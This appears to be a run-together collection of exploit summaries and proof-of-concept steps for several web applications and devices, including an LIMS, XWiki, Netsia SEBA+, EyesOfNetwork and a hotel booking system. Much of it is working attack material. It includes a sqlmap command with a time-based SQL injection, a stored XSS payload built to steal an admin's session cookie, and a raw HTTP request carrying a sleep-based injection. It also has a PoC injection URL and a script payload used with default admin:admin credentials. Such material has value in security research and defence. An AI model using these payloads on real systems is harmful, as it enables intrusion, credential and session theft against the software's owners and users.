Log in to the application, go to clientStatus.php?client_id=, and use sqlmap -u http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1 to exploit the vulnerability.
XWiki 12.10.2 allows XSS via an SVG document to the upload feature of the comment section.
An unspecified CGI script in Cisco FX-OS before 1.1.2 on Firepower 9000 devices and Cisco Unified Computing System (UCS) Manager before 2.2(4b), 2.2(5) before 2.2(5a), and 3.0 before 3.0(2e) allows remote attackers to execute arbitrary shell commands via a crafted HTTP request, aka Bug ID CSCur90888.
This module exploits an authentication bypass in Netsia SEBA+, triggered by adding a new root/admin user. HTTP requests to the 'Active Sessions' section, which is intended to be accessible to a root/admin user, can be made without any session (cookie) information. Therefore, the session cookie information of the active users in the application can be read from the response content. A new authorized user can be created with the obtained cookie.
E-Learning System 1.0 is vulnerable to authentication bypass and remote code execution. An attacker can bypass authentication by using SQL injection and can execute arbitrary code by using the vulnerable add_post.php page.
Go to the sign-up page. In the "Last Name" field, use the following XSS payload "><img src=xx onerror=alert(document.cookie)> as the name and click on save. This should trigger the stored XSS payload in the admin panel's users tab once the admin logs in to the application to verify the registered user's email address. The attacker steals the admin session cookie.
EyesOfNetwork 5.3 is vulnerable to a remote code execution vulnerability due to an arbitrary file upload. An attacker can exploit this vulnerability by uploading a malicious file to the server and then executing it. This can be done by using the curl command to upload the file and then using the curl command to execute it. The attacker can then start a listener on their machine to receive the output of the malicious file.
The 'person' parameter is vulnerable to time-based SQL Injection. Using Burp Suite, send the following POST request:

POST /marimar/index.php?p=booking HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://localhost
Connection: close
Referer: http://localhost/marimar/index.php?p=booking
Cookie: PHPSESSID=cf40af0022f401c8cfd0be17fc00a6cc
Upgrade-Insecure-Requests: 1

arrival=01%2F19%2F2021&departure=01%2F11%2F2021&person=(select*from(select(sleep(10)))a)&accomodation=0

Vulnerable to SQL Injection. The 'id' parameter at http://localhost/marimar/admin/mod_room/index.php?view=edit&id=11 is vulnerable to time-based SQL injection. Payload: (select*from(select(sleep(10)))a) Proof of Concept: http://localhost/marimar/admin/mod_room/index.php?view=edit&id=(select*from(select(sleep(10)))a)
The room 'description' parameter is vulnerable to stored Cross-site Scripting. Log in with administrator credentials at http://localhost/admin with admin:admin and click on the 'Rooms' tab. Edit the 'description' parameter with 1<script>alert('document.cookie')</script> and any user at http://localhost/marimar/index.php will get the XSS pop-up warning with their cookie values.